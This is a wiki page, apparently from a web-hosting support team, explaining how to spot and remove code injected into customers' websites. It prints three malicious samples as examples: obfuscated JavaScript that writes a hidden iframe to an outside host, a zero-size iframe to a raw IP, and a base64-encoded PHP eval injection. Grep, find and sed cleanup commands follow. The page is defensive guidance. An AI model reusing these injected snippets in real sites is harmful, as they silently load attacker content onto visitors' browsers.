Work:Virus on Site

From Zoelife4U Wiki
Jump to: navigation, search

Got a customer that says his website has a virus? Here's what to look for and what to do about it.

Contents

How sites infect visitors

My first action is to look for a block of obfuscated javascript or one or more sets of iframe tags as the first or last lines of the affected page. If you don't see it there, go ahead and browse the content of the page to see if its been more carefully placed.

Javascript

Example: 

<script>function v48089e1ba7ba7(v48089e1ba7f8d){ function v48089e1ba8375 () {return 16;}
return(parseInt(v48089e1ba7f8d,v48089e1ba8375()));}function v48089e1ba8b45(v48089e1ba8f2f){  var 
v48089e1ba9316='';for(v48089e1ba96fc=0; v48089e1ba96fc<v48089e1ba8f2f.length; v48089e1ba96fc+=2){ 
v48089e1ba9316+=(String.fromCharCode(v48089e1ba7ba7(v48089e1ba8f2f.substr(v48089e1ba96fc, 2))));}return 
v48089e1ba9316;} document.write(v48089e1ba8b45('3C696672616D65206E616D653D273227207372633D2768747470
3A2F2F636F6C65686F73742E636E2F696E6465782E706870272077696474683D333831206865696768743D323739207374796C
653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

IFRAME

Example: 

 <iframe src="http://124.217.252.62/~admin/count.php?o=3" width=0 height=0 style="hidden" frameborder=0 
marginheight=0 marginwidth=0 scrolling=no></iframe>

Base64_Decode

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9sYXJlZG9idS9wdWJsaWNfaHRtbC90dWxhcmVkby9kaXNjdXNzaW9uL3RlbXBsYXRlcy9zdWJTaWx2ZXIvaW1hZ2VzL2xhbmdfa29yZWFuL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9sYXJlZG9idS9wdWJsaWNfaHRtbC90dWxhcmVkby9kaXNjdXNzaW9uL3RlbXBsYXRlcy9zdWJTaWx2ZXIvaW1hZ2VzL2xhbmdfa29yZWFuL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I think I found it. Now what?

Backup the file

We want to delete it of course, but always make a backup of the file before you do.

Remove the malicious code

Remove the bad stuff and save the changes.

Test for success

Browse to the page online again to see if its still infected. Hit refresh or clear cache as needed.

Look for more infected files

This is where it gets exciting. You might copy a unique looking portion of the code and then see if you can find other files on the account that match. For example, v48089e1ba7ba7 from the javascript above, or 124.217.252.62 from the iframe. And here's how you might setup your search... 

find ./ -type f -exec grep -Hl 'v48089e1ba7ba7' {} \;
find ./ -type f -exec grep -Hl '124.217.252.62' {} \;

These commands would return a list of filenames that match the search. Next, just manually backup and edit each in turn.

With clever use of the find and sed commands, its possible to find and remove the malicious code from all infected files at once. This one is easy to screw up, so definitely have a backup. 

cp -a public_html/ public_html.bak
find ./public_html/ -type f -exec sed -i 's/<iframe.*124.217.252.62.*iframe>//g' {} \;

Alternately, use the find and replace commands to do it. 

find ./ -name page2.html -exec replace '<iframe src="http://124.217.252.62/~admin/count.php?o=3" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' '' -- {} \;

Rid some code from the files

Here are assorted commands to remove hacker code from files. Most have been tested to work.

Base64_Decode Hacks 

for i in `grep -Rl base64_decode public_html/*`;do [ -e $i ]  | sed -i 's/eval(base64_decode.*));//g' $i; done;

IFrame Hacks 

for i in `grep -Rl 124.217.252.62 public_html/`;do [ -e $i ]  | sed -i 's/<iframe.*><\/iframe>//g' $i; done;
Retrieved from "http://wiki.zoelife4u.org/index.php/Work:Virus_on_Site"
Personal tools
Online Users
Zoelife4U: